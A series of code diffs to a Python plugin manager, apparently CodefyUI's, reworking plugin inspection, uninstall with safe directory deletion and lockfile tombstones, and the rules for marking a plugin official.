+    cannot, and gets ``catalog_id=None`` with ``official=False``, because
+    "official" is a claim only the catalog is entitled to make.
+    """
+    parsed = sources.parse_source(spec)
+    if parsed.kind != "catalog":
+        return inspect_github(
+            parsed.name_or_owner, parsed.repo, parsed.ref, lockfile=lockfile
+        )
+
+    entry = catalog_module.catalog_entry(parsed.name_or_owner)
+    if entry is None:
+        # parse_source matched the raw registry and validate_catalog dropped
+        # the row. The pack is named but not installable, and saying which of
+        # those it is beats either half on its own.
+        raise PluginInstallError(
+            f"The catalog entry for {parsed.name_or_owner!r} is malformed.",
+            hint=f"Its row in {catalog_module.catalog_path()} was not readable.",
+        )
+    if entry.kind == "builtin":
+        return inspect_builtin(entry.id, lockfile=lockfile)
+    owner, _, repo = (entry.repo or "").partition("/")
+    return inspect_github(
+        owner,
+        repo,
+        entry.ref,
+        lockfile=lockfile,
+        catalog_id=entry.id,
+        official=entry.official,
+    )
+
+
+def inspect_installed(plugin_id: str, *, lockfile: dict[str, Any]) -> Inspection:
+    """Describe the update available for an installed repository plugin.
+
+    The source is taken from the lockfile rather than re-typed, which is what
+    makes ``cdui plugin update`` and the Plugin Center's update button follow
+    the same repository and the same ref the user originally agreed to.
+
+    Only ``github_url`` plugins have an update to look for: a built-in pack
+    updates with CodefyUI itself, and a linked development directory is
+    whatever is on the developer's disk right now.
+    """
+    entry = _lockfile_entry(lockfile, plugin_id)
+    if entry is None:
+        raise PluginInstallError(f"Plugin {plugin_id!r} is not installed.")
+    source_kind = entry.get("source_kind")
+    if source_kind != "github_url":
+        raise PluginInstallError(
+            f"Plugin {plugin_id!r} does not update from a repository.",
+            hint=f"Its source_kind is {source_kind!r}.",
+        )
+    url = _text(entry.get("url"))
+    match = _GITHUB_URL.match(url) or _GITHUB_SHORT.match(_text(entry.get("source")))
+    if match is None:
+        raise PluginInstallError(
+            f"Cannot tell which repository {plugin_id!r} came from.",
+            hint=f"url={entry.get('url')!r} source={entry.get('source')!r}",
+        )
+    return inspect_github(
+        match.group(1),
+        match.group(2),
+        _text(entry.get("ref")),
+        lockfile=lockfile,
+    )

--- a/backend/app/core/plugins/lifecycle.py
+++ b/backend/app/core/plugins/lifecycle.py
@@ -1,0 +1,239 @@
+"""Turning a plugin off, on, or out -- the three writes, without a caller.
+
+Enable, disable and uninstall are three lockfile edits with rules attached:
+a disable of something already disabled must not rewrite the file, an
+uninstall must never delete a directory it did not download, and a built-in
+pack has to leave a tombstone behind so ``cdui plugin sync`` does not put
+back what the user just threw away (#175). Those rules lived twice -- once in
+``scripts/plugins.py``, printing bilingually as it went, and once in
+``routes_plugins.py``, raising ``HTTPException`` as it went -- and the second
+copy was written by reading the first. A rule that exists twice is a rule
+that will disagree with itself, and here the disagreement would be about
+which files get deleted.
+
+So the writes happen here and produce a VALUE. What the caller does with it
+is the caller's business: the CLI prints its zh/en pair, the route returns
+JSON, and neither has to know what the other says. Nothing in this module
+prints, raises for control flow, or reloads the registry -- the reload is
+the caller's next line (``rediscover_now()`` in the server, an HTTP POST to
+a possibly-absent server in the CLI), and doing it here would make an
+uninstall in the CLI process pointlessly re-import every pack that is left.
+
+:class:`UninstallOutcome` is deliberately fuller than what either caller
+needs today: an uninstall leaves the plugin's Python dependencies behind
+(uninstalling packages from inside the process that imported them is how you
+get a half-loaded interpreter serving requests -- see ``routes_packs.py``),
+and the only honest thing to do about that is to say so and hand over the
+command. The value carries the answer so that neither caller has to re-derive
+it from a manifest that is, by then, sometimes deleted.
+"""
+
+from __future__ import annotations
+
+import logging
+import shutil
+import sys
+from collections.abc import Collection
+from dataclasses import dataclass
+from pathlib import Path
+from typing import Any
+
+from app.core import plugin_loader
+
+from .catalog import builtin_catalog_packs
+from .manifest import manifest_python_deps
+
+logger = logging.getLogger(__name__)
+
+
+def set_enabled(plugin_id: str, enabled: bool) -> bool | None:
+    """Flip a plugin's ``enabled`` flag. Returns what happened.
+
+    ``None`` means there is no such plugin in the lockfile, ``False`` that it
+    was already in that state and nothing was written, ``True`` that the flag
+    was flipped and saved. Three answers rather than two because the callers
+    say three different things: the CLI prints "already disabled (no-op)", the
+    route 404s, and only the last one is a change worth reloading for.
+
+    The file is deliberately NOT rewritten for a no-op. A lockfile rewrite is
+    what a backup tool, a file watcher and a project diff all see, and "the
+    user pressed disable twice" is not a change any of them should be told
+    about.
+    """
+    lockfile = plugin_loader.load_lockfile()
+    entry = lockfile.get("plugins", {}).get(plugin_id)
+    if not entry:
+        return None
+    if plugin_loader.is_enabled(entry) == enabled:
+        return False
+    entry["enabled"] = enabled
+    plugin_loader.save_lockfile(lockfile)
+    return True
+
+
+@dataclass(frozen=True)
+class UninstallOutcome:
+    """What an uninstall did, and what it deliberately left behind."""
+
+    plugin_id: str
+    #: The lockfile entry is gone. Always true in a returned outcome -- the
+    #: field exists so a caller can say it rather than assume it.
+    removed: bool
+    #: A ``removed`` record was written, so ``cdui plugin sync`` will not
+    #: re-add this pack. Only built-in packs get one (#175).
+    tombstoned: bool
+    #: ``True`` the downloaded directory is gone, ``False`` it could not be
+    #: deleted and is still there, ``None`` there was never a copy of ours to
+    #: delete (a built-in pack is repo code; a linked one is the author's own
+    #: working tree).
+    files_removed: bool | None
+    #: ``[python_deps]`` names this plugin asked for, which are still
+    #: installed in the interpreter. See the module docstring for why nothing
+    #: uninstalls them.
+    python_deps_left: tuple[str, ...]
+    #: The command that WOULD remove those packages, to run by hand with the
+    #: server stopped; ``None`` when the plugin declared none.
+    uninstall_command: str | None
+    #: How to get this plugin back.
+    reinstall_hint: str
+
+
+def uninstall_plugin(
+    plugin_id: str,
+    *,
+    builtin_ids: Collection[str] | None = None,
+) -> UninstallOutcome | None:
+    """Remove a plugin from this install. ``None`` when it was not installed.
+
+    The order is load-bearing. The manifest is read while the files are still
+    there, the modules are dropped from ``sys.modules`` before anything moves
+    (a re-install of the same id would otherwise reload the OLD path a cached
+    module remembers), the files go, and only then is the lockfile written --
+    so an interrupted uninstall leaves an entry pointing at a directory that
+    is gone, which every reader already handles, rather than a directory no
+    entry mentions, which nothing would ever clean up.
+
+    *builtin_ids* overrides which ids count as built-in packs for the
+    tombstone rule. It exists for ``scripts/plugins.py``, whose tests fake
+    the catalog by patching the CLI's own root: without it this would read
+    past the patch and answer from the real ``registry.json``. Same reason
+    :func:`~app.core.plugins.catalog.catalog_path` takes a root.
+    """
+    lockfile = plugin_loader.load_lockfile()
+    entry = lockfile.get("plugins", {}).get(plugin_id)
+    if not entry:
+        return None
+
+    deps = tuple(sorted(_declared_python_deps(plugin_id, lockfile)))
+    plugin_loader.purge_plugin_modules(plugin_id)
+
+    files_removed: bool | None = None
+    if entry.get("source_kind") == "github_url":
+        files_removed = _remove_downloaded_files(plugin_id)
+
+    lockfile["plugins"].pop(plugin_id, None)
+
+    # Remember the decision instead of merely forgetting the pack (#175).
+    # Popping the entry made "never installed" and "removed on purpose" the
+    # same state, so `cdui plugin sync` would have to either re-install what
+    # the user just threw away or nag about it forever. Only built-in packs
+    # are tombstoned: they are the only ones sync can put back uninvited, and
+    # a tombstone nothing reads is dead data the user would still have to
+    # explain.
+    known_builtins = builtin_catalog_packs() if builtin_ids is None else builtin_ids
+    tombstoned = (
+        entry.get("source_kind") == "builtin" or plugin_id in known_builtins
+    )
+    if tombstoned:
+        plugin_loader.mark_removed(
+            lockfile, plugin_id, source_kind=entry.get("source_kind")
+        )
+    plugin_loader.save_lockfile(lockfile)
+
+    return UninstallOutcome(
+        plugin_id=plugin_id,
+        removed=True,
+        tombstoned=tombstoned,
+        files_removed=files_removed,
+        python_deps_left=deps,
+        uninstall_command=(
+            f"uv pip uninstall --python {sys.executable} {' '.join(deps)}"
+            if deps
+            else None
+        ),
+        reinstall_hint=f"cdui plugin install {plugin_id}",
+    )
+
+
+def _declared_python_deps(plugin_id: str, lockfile: dict[str, Any]) -> list[str]:
+    """The ``[python_deps]`` names in the installed plugin's manifest.
+
+    Read off the disk rather than out of the lockfile because the lockfile
+    records the ``[plugin]`` table only -- and read BEFORE the files go,
+    which is the whole reason this is a separate step.
+    """
+    plugin_dir = installed_dir(plugin_id, lockfile)
+    if plugin_dir is None:
+        return []
+    manifest = plugin_loader.read_manifest_safe(plugin_dir)
+    return [name for name in manifest_python_deps(manifest) if isinstance(name, str)]
+
+
+def installed_dir(plugin_id: str, lockfile: dict[str, Any]) -> Path | None:
+    """Where an installed plugin's files are, or ``None`` when they are gone.
+
+    Goes through ``iter_plugin_dirs`` rather than rebuilding its
+    source-kind-to-directory rule (built-in root, user root, or the absolute
+    path a linked plugin recorded), which is the rule discovery itself uses.
+    A plugin whose directory or manifest has disappeared is not yielded, so
+    ``None`` here is exactly the Plugin Center's ``missing_files``.
+    """
+    for pid, plugin_dir in plugin_loader.iter_plugin_dirs(
+        plugin_loader.plugins_builtin_root(),
+        plugin_loader.plugins_user_root(),
+        lockfile,
+        include_disabled=True,
+    ):
+        if pid == plugin_id:
+            return plugin_dir
+    return None
+
+
+def _remove_downloaded_files(plugin_id: str) -> bool:
+    """Delete ``<user root>/<plugin_id>/``; report whether it is gone.
+
+    The containment check is the point: this is the one place in the plugin
+    system that runs ``rmtree`` on a path built from an id, so the resolved
+    directory has to sit DIRECTLY in the resolved user root or nothing is
+    deleted. Resolving both sides is what makes a symlinked pack directory --
+    or a symlinked user root, which is what a temp directory is on macOS --
+    answer the question about the real target.
+
+    A failure is reported, not raised: the entry is removed either way, so a
+    pack whose files Windows is holding open stops claiming to be installed
+    instead of becoming impossible to uninstall.
+    """
+    user_root = plugin_loader.plugins_user_root()
+    target = user_root / plugin_id
+    try:
+        resolved = target.resolve()
+        root = user_root.resolve()
+    except OSError as exc:  # pragma: no cover - resolve() rarely fails
+        logger.warning("plugin uninstall: cannot resolve %s: %s", target, exc)
+        return False
+    if resolved.parent != root:
+        logger.warning(
+            "plugin uninstall: refusing to delete %s -- it is not directly "
+            "inside %s",
+            resolved,
+            root,
+        )
+        return False
+    if not resolved.exists():
+        return True
+    try:
+        shutil.rmtree(resolved)
+    except OSError as exc:
+        logger.warning("plugin uninstall: failed to delete %s: %s", resolved, exc)
+        return False
+    return True

--- a/backend/app/core/plugins/lifecycle.py
+++ b/backend/app/core/plugins/lifecycle.py
@@ -111,18 +111,22 @@ def uninstall_plugin(
 ) -> UninstallOutcome | None:
     """Remove a plugin from this install. ``None`` when it was not installed.
 
-    The order is load-bearing. The manifest is read while the files are still
-    there; the modules are dropped from ``sys.modules`` next, both because a
-    re-install of the same id would otherwise reload the OLD path a cached
-    module remembers and because an imported module is one of the things that
-    can hold a file open on Windows; the files go; and only then is the
-    lockfile written.
+    The order is load-bearing: the manifest is read while the files are still
+    there, the files go next, and only then is the lockfile written. That is
+    the reason the delete comes first -- if it fails, the entry stays, the
+    plugin stays installed, and the caller is told why (``removed=False``
+    with an ``error``). The alternative, popping the entry anyway, would
+    leave a directory no lockfile mentions, which nothing in this system
+    would ever look at again, let alone clean up.
 
-    That last step is the reason the delete comes first: if it fails, the
-    entry stays, the plugin stays installed, and the caller is told why
-    (``removed=False`` with an ``error``). The alternative -- popping the
-    entry anyway -- would leave a directory no lockfile mentions, which
-    nothing in this system would ever look at again, let alone clean up.
+    Nothing here touches ``sys.modules``. The CLI runs in its own process and
+    never imported the plugin, so there would be nothing to drop; and the
+    in-process caller -- the DELETE route -- purges the plugin's modules
+    itself, immediately before ``rediscover_now()``, which is where the
+    namespace finder is re-created for everything still installed. Purging
+    from in here would put the two half a call apart with no reload between
+    them, and a namespace dropped without being rebuilt is a plugin nothing
+    can import until the next full re-discovery.
 
     *builtin_ids* overrides which ids count as built-in packs for the
     tombstone rule. It exists for ``scripts/plugins.py``, whose tests fake
@@ -136,7 +140,6 @@ def uninstall_plugin(
         return None
 
     deps = tuple(sorted(_declared_python_deps(plugin_id, lockfile)))
-    plugin_loader.purge_plugin_modules(plugin_id)
 
     files_removed: bool | None = None
     if entry.get("source_kind") == "github_url":

--- a/backend/app/core/plugins/lifecycle.py
+++ b/backend/app/core/plugins/lifecycle.py
@@ -98,6 +98,14 @@ class UninstallOutcome:
     uninstall_command: str | None
     #: How to get this plugin back.
     reinstall_hint: str
+    #: The directory this uninstall deleted, or tried to; ``None`` when there
+    #: was never a copy of ours to delete. Reported rather than left for the
+    #: caller to rebuild from the id and the user root: that rebuild is this
+    #: module's own rule about where a pack's files live, and a caller
+    #: repeating it would name the wrong path the day the rule changes --
+    #: while what a failed uninstall has to tell the user is exactly WHICH
+    #: directory is still there.
+    directory: Path | None = None
     #: Why the uninstall was abandoned, in one line, or ``None`` when it was
     #: not. Text rather than the exception: the caller says it in its own
     #: language and its own envelope, and neither wants a traceback.
@@ -142,12 +150,14 @@ def uninstall_plugin(
     deps = tuple(sorted(_declared_python_deps(plugin_id, lockfile)))
 
     files_removed: bool | None = None
+    directory: Path | None = None
     if entry.get("source_kind") == "github_url":
-        files_removed, failure = _remove_downloaded_files(plugin_id)
+        files_removed, failure, directory = _remove_downloaded_files(plugin_id)
         if not files_removed:
             return _outcome(
                 plugin_id, removed=False, tombstoned=False,
                 files_removed=False, deps=deps, error=failure,
+                directory=directory,
             )
 
     lockfile["plugins"].pop(plugin_id, None)
@@ -172,6 +182,7 @@ def uninstall_plugin(
     return _outcome(
         plugin_id, removed=True, tombstoned=tombstoned,
         files_removed=files_removed, deps=deps, error=None,
+        directory=directory,
     )
 
 
@@ -183,6 +194,7 @@ def _outcome(
     files_removed: bool | None,
     deps: tuple[str, ...],
     error: str | None,
+    directory: Path | None = None,
 ) -> UninstallOutcome:
     """One :class:`UninstallOutcome`, so the two exits agree on the fields
     that describe the PLUGIN rather than the attempt.
@@ -203,6 +215,7 @@ def _outcome(
             else None
         ),
         reinstall_hint=f"cdui plugin install {plugin_id}",
+        directory=directory,
         error=error,
     )
 
@@ -241,8 +254,12 @@ def installed_dir(plugin_id: str, lockfile: dict[str, Any]) -> Path | None:
     return None
 
 
-def _remove_downloaded_files(plugin_id: str) -> tuple[bool, str | None]:
-    """Delete ``<user root>/<plugin_id>/``. Answers ``(gone, why not)``.
+def _remove_downloaded_files(plugin_id: str) -> tuple[bool, str | None, Path]:
+    """Delete ``<user root>/<plugin_id>/``. Answers ``(gone, why not, where)``.
+
+    The directory is returned rather than left to be rebuilt by a caller,
+    because building it is this function's own rule (see below) and a caller
+    repeating it is a second copy that can name a different path.
 
     The containment check is the point: this is the one place in the plugin
     system that runs ``rmtree`` on a path built from an id, so the resolved
@@ -270,7 +287,7 @@ def _remove_downloaded_files(plugin_id: str) -> tuple[bool, str | None]:
         resolved = target.resolve()
         root = user_root.resolve()
     except OSError as exc:  # pragma: no cover - resolve() rarely fails
-        return False, str(exc)
+        return False, str(exc), target
     if resolved.parent != root:
         logger.warning(
             "plugin uninstall: refusing to delete %s -- it is not directly "
@@ -278,11 +295,11 @@ def _remove_downloaded_files(plugin_id: str) -> tuple[bool, str | None]:
             resolved,
             root,
         )
-        return False, f"{resolved} is not directly inside {root}"
+        return False, f"{resolved} is not directly inside {root}", target
     if not resolved.exists():
-        return True, None
+        return True, None, target
     try:
         shutil.rmtree(resolved)
     except OSError as exc:
-        return False, str(exc)
-    return True, None
+        return False, str(exc), target
+    return True, None, target

--- a/backend/app/core/plugins/lifecycle.py
+++ b/backend/app/core/plugins/lifecycle.py
@@ -76,16 +76,18 @@ class UninstallOutcome:
     """What an uninstall did, and what it deliberately left behind."""
 
     plugin_id: str
-    #: The lockfile entry is gone. Always true in a returned outcome -- the
-    #: field exists so a caller can say it rather than assume it.
+    #: The lockfile entry is gone, i.e. the plugin is uninstalled. ``False``
+    #: means the uninstall was ABANDONED and the plugin is still installed --
+    #: see ``error`` for why. There is no half state: nothing is popped
+    #: unless the files this install downloaded are actually gone.
     removed: bool
     #: A ``removed`` record was written, so ``cdui plugin sync`` will not
     #: re-add this pack. Only built-in packs get one (#175).
     tombstoned: bool
     #: ``True`` the downloaded directory is gone, ``False`` it could not be
-    #: deleted and is still there, ``None`` there was never a copy of ours to
-    #: delete (a built-in pack is repo code; a linked one is the author's own
-    #: working tree).
+    #: deleted (and then ``removed`` is ``False`` too), ``None`` there was
+    #: never a copy of ours to delete (a built-in pack is repo code; a linked
+    #: one is the author's own working tree).
     files_removed: bool | None
     #: ``[python_deps]`` names this plugin asked for, which are still
     #: installed in the interpreter. See the module docstring for why nothing
@@ -96,6 +98,10 @@ class UninstallOutcome:
     uninstall_command: str | None
     #: How to get this plugin back.
     reinstall_hint: str
+    #: Why the uninstall was abandoned, in one line, or ``None`` when it was
+    #: not. Text rather than the exception: the caller says it in its own
+    #: language and its own envelope, and neither wants a traceback.
+    error: str | None = None
 
 
 def uninstall_plugin(
@@ -106,12 +112,17 @@ def uninstall_plugin(
     """Remove a plugin from this install. ``None`` when it was not installed.
 
     The order is load-bearing. The manifest is read while the files are still
-    there, the modules are dropped from ``sys.modules`` before anything moves
-    (a re-install of the same id would otherwise reload the OLD path a cached
-    module remembers), the files go, and only then is the lockfile written --
-    so an interrupted uninstall leaves an entry pointing at a directory that
-    is gone, which every reader already handles, rather than a directory no
-    entry mentions, which nothing would ever clean up.
+    there; the modules are dropped from ``sys.modules`` next, both because a
+    re-install of the same id would otherwise reload the OLD path a cached
+    module remembers and because an imported module is one of the things that
+    can hold a file open on Windows; the files go; and only then is the
+    lockfile written.
+
+    That last step is the reason the delete comes first: if it fails, the
+    entry stays, the plugin stays installed, and the caller is told why
+    (``removed=False`` with an ``error``). The alternative -- popping the
+    entry anyway -- would leave a directory no lockfile mentions, which
+    nothing in this system would ever look at again, let alone clean up.
 
     *builtin_ids* overrides which ids count as built-in packs for the
     tombstone rule. It exists for ``scripts/plugins.py``, whose tests fake
@@ -129,7 +140,12 @@ def uninstall_plugin(
 
     files_removed: bool | None = None
     if entry.get("source_kind") == "github_url":
-        files_removed = _remove_downloaded_files(plugin_id)
+        files_removed, failure = _remove_downloaded_files(plugin_id)
+        if not files_removed:
+            return _outcome(
+                plugin_id, removed=False, tombstoned=False,
+                files_removed=False, deps=deps, error=failure,
+            )
 
     lockfile["plugins"].pop(plugin_id, None)
 
@@ -150,9 +166,31 @@ def uninstall_plugin(
         )
     plugin_loader.save_lockfile(lockfile)
 
+    return _outcome(
+        plugin_id, removed=True, tombstoned=tombstoned,
+        files_removed=files_removed, deps=deps, error=None,
+    )
+
+
+def _outcome(
+    plugin_id: str,
+    *,
+    removed: bool,
+    tombstoned: bool,
+    files_removed: bool | None,
+    deps: tuple[str, ...],
+    error: str | None,
+) -> UninstallOutcome:
+    """One :class:`UninstallOutcome`, so the two exits agree on the fields
+    that describe the PLUGIN rather than the attempt.
+
+    The dependency facts are reported either way: they are true of the plugin
+    whether or not this call removed it, and a caller showing "and these
+    packages stay installed" must not have to ask which exit it came from.
+    """
     return UninstallOutcome(
         plugin_id=plugin_id,
-        removed=True,
+        removed=removed,
         tombstoned=tombstoned,
         files_removed=files_removed,
         python_deps_left=deps,
@@ -162,6 +200,7 @@ def uninstall_plugin(
             else None
         ),
         reinstall_hint=f"cdui plugin install {plugin_id}",
+        error=error,
     )
 
 
@@ -199,8 +238,8 @@ def installed_dir(plugin_id: str, lockfile: dict[str, Any]) -> Path | None:
     return None
 
 
-def _remove_downloaded_files(plugin_id: str) -> bool:
-    """Delete ``<user root>/<plugin_id>/``; report whether it is gone.
+def _remove_downloaded_files(plugin_id: str) -> tuple[bool, str | None]:
+    """Delete ``<user root>/<plugin_id>/``. Answers ``(gone, why not)``.
 
     The containment check is the point: this is the one place in the plugin
     system that runs ``rmtree`` on a path built from an id, so the resolved
@@ -209,9 +248,18 @@ def _remove_downloaded_files(plugin_id: str) -> bool:
     or a symlinked user root, which is what a temp directory is on macOS --
     answer the question about the real target.
 
-    A failure is reported, not raised: the entry is removed either way, so a
-    pack whose files Windows is holding open stops claiming to be installed
-    instead of becoming impossible to uninstall.
+    A failure is reported rather than raised, and the caller stops on it: a
+    pack whose files are still there is a pack that will load again on the
+    next start, so calling it uninstalled would be a lie the lockfile then
+    tells forever. An ABSENT directory is success -- there is nothing of ours
+    left, which is all "removed" ever meant.
+
+    Only the containment refusal is also LOGGED. Every failure here is
+    returned, and the caller says it -- logging the ordinary one (a file
+    Windows is holding open) would print the same sentence twice in the same
+    terminal. A path that resolves outside the user root is not an ordinary
+    failure and not a user mistake, so the record of it should exist
+    somewhere other than one line the user may have already scrolled past.
     """
     user_root = plugin_loader.plugins_user_root()
     target = user_root / plugin_id
@@ -219,8 +267,7 @@ def _remove_downloaded_files(plugin_id: str) -> bool:
         resolved = target.resolve()
         root = user_root.resolve()
     except OSError as exc:  # pragma: no cover - resolve() rarely fails
-        logger.warning("plugin uninstall: cannot resolve %s: %s", target, exc)
-        return False
+        return False, str(exc)
     if resolved.parent != root:
         logger.warning(
             "plugin uninstall: refusing to delete %s -- it is not directly "
@@ -228,12 +275,11 @@ def _remove_downloaded_files(plugin_id: str) -> bool:
             resolved,
             root,
         )
-        return False
+        return False, f"{resolved} is not directly inside {root}"
     if not resolved.exists():
-        return True
+        return True, None
     try:
         shutil.rmtree(resolved)
     except OSError as exc:
-        logger.warning("plugin uninstall: failed to delete %s: %s", resolved, exc)
-        return False
-    return True
+        return False, str(exc)
+    return True, None

--- a/backend/app/core/plugins/listing.py
+++ b/backend/app/core/plugins/listing.py
@@ -144,17 +144,58 @@ def frontend_entry_url(
     return f"/plugins/{plugin_id}/{entry_rel}"
 
 
-def is_official(row: CatalogEntry | None) -> bool:
-    """Does CodefyUI vouch for this plugin?
+def is_official(row: CatalogEntry | None, entry: dict[str, Any] | None) -> bool:
+    """Does CodefyUI vouch for THIS plugin -- not just for this id?
 
-    True for anything the catalog ships as ``builtin`` -- a pack that arrived
-    with the release, through a pull request in this repository, is first
-    party by construction, which is the same reasoning
-    :func:`~app.core.plugins.inspect.inspect_builtin` states -- and for a
-    ``github`` row the catalog explicitly marks ``official``. Everything
-    else, including a plugin installed from a URL, is not.
+    The badge is a claim about provenance, so matching the catalog by id is
+    not enough to earn it. An id is only reserved against a foreign install
+    when this build owns it outright (a route, or a pack that ships here);
+    the ids of the catalog's ``github`` rows are deliberately NOT reserved,
+    because the author of an official plugin has to be able to install their
+    own repository under its own id. That leaves a hole an id-only rule falls
+    straight into: install ``mallory/evil``, whose manifest says
+    ``id = "self-learning"``, and the row would wear the official badge over
+    a ``repo`` field reading ``mallory/evil``.
+
+    So a row is official when the catalog vouches for it AND the install in
+    front of us really is the thing the catalog named:
+
+    * nothing installed under the id -- the row IS the catalog's, so the
+      badge describes what installing it would get you;
+    * a ``builtin`` row installed as ``source_kind = "builtin"`` -- activated
+      in place from this release's own files, which is the only way a
+      built-in pack can arrive;
+    * a ``github`` row installed with the recorded ``catalog_id``, which
+      ``cdui plugin install <name>`` writes only when the install really came
+      from that row;
+    * a ``github`` row whose repository is the one the install recorded --
+      case-insensitively, because GitHub owners and repositories are. This is
+      the free-text install of the catalog's own repository
+      (``cdui plugin install CodefyUI/CodefyUI-Plugin-Self-Learning``), which
+      is the same code by a longer road.
+
+    Everything else is false, including every ``external`` row, and including
+    a plugin LINKED from a local directory under a catalog id: a working tree
+    is whatever the author has in it right now, and nothing about it can be
+    checked against the repository the catalog names.
     """
-    return row is not None and (row.kind == "builtin" or row.official)
+    if row is None:
+        return False
+    # A ``github`` row the catalog does not mark ``official`` is a third
+    # party the catalog merely lists -- it never earns the badge, however it
+    # was installed.
+    if not (row.kind == "builtin" or row.official):
+        return False
+    if entry is None:
+        return True
+    if row.kind == "builtin":
+        return entry.get("source_kind") == "builtin"
+    if _text(entry.get("catalog_id")) == row.id:
+        return True
+    installed = _repo_of(entry)
+    return bool(row.repo) and installed is not None and (
+        installed.lower() == row.repo.lower()
+    )
 
 
 def catalog_id_for(
@@ -226,7 +267,7 @@ def installed_facts(
     route and unofficial on the other.
     """
     return {
-        "official": is_official(catalog.get(plugin_id)),
+        "official": is_official(catalog.get(plugin_id), entry),
         "catalog_id": catalog_id_for(plugin_id, entry, catalog),
         "capabilities": declared_capabilities(entry, manifest),
         "trusted_modules": declared_trusted_modules(entry, manifest),
@@ -342,7 +383,7 @@ def _entry_payload(
             or (row.description if row else "")
         ),
         "kind": row.kind if row else "external",
-        "official": is_official(row),
+        "official": is_official(row, entry),
         "status": _status(
             entry=entry, plugin_dir=plugin_dir, tombstoned=tombstoned, job=job
         ),

--- a/backend/app/core/plugins/listing.py
+++ b/backend/app/core/plugins/listing.py
@@ -50,13 +50,16 @@ from .sources import parse_github_url
 #: same list, or one of them is lying to a student whose palette is empty.
 _NODE_NAME_RE = re.compile(r"""NODE_NAME\s*=\s*["']([^"']+)["']""")
 
-#: Scanned node names, keyed by ``(directory, newest mtime in it)``. The key
-#: carries the mtime rather than a timestamp of its own so an edited pack is
-#: a MISS instead of a stale hit -- which is what a plugin author reloading
-#: their own pack needs. Small on purpose: this only ever holds the packs
-#: this build ships, and it is cleared wholesale rather than evicted, because
-#: an LRU for eight entries is more code than the scan it saves.
-_NODE_SCAN_CACHE: dict[tuple[str, float], tuple[str, ...]] = {}
+#: Scanned node names, keyed by ``(directory, file count, newest mtime)``.
+#: The key carries the mtime rather than a timestamp of its own so an edited
+#: pack is a MISS instead of a stale hit -- which is what a plugin author
+#: reloading their own pack needs -- and the COUNT because deleting a file
+#: does not move any other file's mtime: without it, removing the newest
+#: ``.py`` from a pack would keep serving the names it used to declare.
+#: Small on purpose: this only ever holds the packs this build ships, and it
+#: is cleared wholesale rather than evicted, because an LRU for eight entries
+#: is more code than the scan it saves.
+_NODE_SCAN_CACHE: dict[tuple[str, int, float], tuple[str, ...]] = {}
 _NODE_SCAN_LIMIT = 32
 
 
@@ -103,7 +106,7 @@ def scan_node_names(nodes_dir: Path) -> list[str]:
     except OSError:
         return []
 
-    key = (str(nodes_dir), newest)
+    key = (str(nodes_dir), len(files), newest)
     cached = _NODE_SCAN_CACHE.get(key)
     if cached is not None:
         return list(cached)
@@ -384,6 +387,15 @@ def _entry_payload(
     # "" is the default branch on both sides, so an empty recorded ref is an
     # answer rather than a miss.
     ref = _text(entry.get("ref")) if entry is not None else (row.ref if row else "")
+    # Presence, not truthiness: a manifest that says ``chapters = []`` has
+    # answered -- this pack teaches no chapter -- and falling through to the
+    # catalog there would put the row's list on a pack that dropped it.
+    declared_chapters = lessons_meta.get("chapters")
+    chapters = (
+        _strings(declared_chapters)
+        if isinstance(declared_chapters, list)
+        else list(row.chapters if row else ())
+    )
 
     return {
         "id": plugin_id,
@@ -409,10 +421,7 @@ def _entry_payload(
         "version": _text(plugin_meta.get("version")) or None,
         "installed_at": _recorded(entry, "installed_at"),
         "enabled": enabled,
-        "chapters": (
-            _strings(lessons_meta.get("chapters"))
-            or list(row.chapters if row else ())
-        ),
+        "chapters": chapters,
         "lessons": _strings(lessons_meta.get("lessons")),
         "tags": list(row.tags) if row else [],
         "nodes": nodes,
@@ -514,26 +523,39 @@ def _source(
 
 
 def _repo(*, row: CatalogEntry | None, entry: dict[str, Any] | None) -> str | None:
-    """``owner/repo``: what this install came from, else what the catalog says.
+    """``owner/repo``: what THIS install came from, or what the catalog offers.
 
-    In that order, and the same order :func:`_url` uses, so the two fields
-    cannot describe two different repositories on one row. They do disagree
-    in real lockfiles -- a plugin installed from a fork, or from an owner the
-    project has since moved away from -- and when they do, the repository the
-    files actually came from is the one worth showing.
+    Which of those two it is depends on one thing only -- whether anything is
+    installed under the id -- and the catalog is never consulted when
+    something is. An installed row describes an install, so ``None`` there
+    means "nothing recorded says which repository this is", which is the
+    honest answer for a plugin linked from a local directory and for one
+    installed from a URL on a host that is not GitHub. Falling through to the
+    catalog for those printed the OFFICIAL repository beside a pack that had
+    never been near it: the id of a ``github`` catalog row is deliberately
+    not reserved (see :func:`is_official`), so anything at all can be
+    installed under one.
+
+    :func:`_url` splits the same way, so the two fields on a row always
+    describe the same install rather than one each.
     """
-    installed = _repo_of(entry)
-    if installed is not None:
-        return installed
+    if entry is not None:
+        return _repo_of(entry)
     return row.repo if row is not None and row.kind == "github" else None
 
 
 def _url(
     *, row: CatalogEntry | None, entry: dict[str, Any] | None
 ) -> str | None:
-    """The repository this came from, when it came from one."""
-    if entry is not None and _text(entry.get("url")):
-        return _text(entry.get("url"))
+    """The repository this came from, when it came from one.
+
+    The install's own recorded URL wins outright, including when it recorded
+    none: a link to the catalog's GitHub page beside a plugin that came from
+    somewhere else is the same lie :func:`_repo` refuses, in the form a
+    reader is most likely to click.
+    """
+    if entry is not None:
+        return _text(entry.get("url")) or None
     if row is not None and row.kind == "github" and row.repo:
         return f"https://github.com/{row.repo}"
     return None

--- a/backend/app/core/plugins/listing.py
+++ b/backend/app/core/plugins/listing.py
@@ -42,6 +42,7 @@ from .manifest import (
     manifest_has_frontend,
     manifest_python_deps,
 )
+from .sources import parse_github_url
 
 #: How a node announces its name. The same expression the catalog-honesty
 #: test scans packs with, deliberately: what the Plugin Center promises a
@@ -205,18 +206,27 @@ def catalog_id_for(
 ) -> str | None:
     """The catalog row an installed plugin came from, or ``None``.
 
-    The recorded ``catalog_id`` wins: ``cdui plugin install <name>`` writes
-    it precisely so a later reader can tell the catalog's own pack from free
-    text that happens to carry the same id. A built-in install records none
-    (its ``source`` IS the catalog id), so the id is matched against the
-    catalog instead -- which is safe because the reserved-id rule refuses an
-    install that claims a catalog id from anywhere but the repository the
-    catalog names.
+    Matching the id against the catalog says only that this row LINES UP with
+    that entry -- it is not a reserved-id rule, because the ids of the
+    catalog's ``github`` rows deliberately are not reserved (see
+    :func:`is_official`), so a pack fetched from anywhere at all can arrive
+    carrying ``id = "self-learning"``. Answering ``self-learning`` for that
+    one would point the panel at a catalog card describing different code.
+
+    So the id is reported only when the install can be tied to the row. The
+    recorded ``catalog_id`` wins: ``cdui plugin install <name>`` writes it
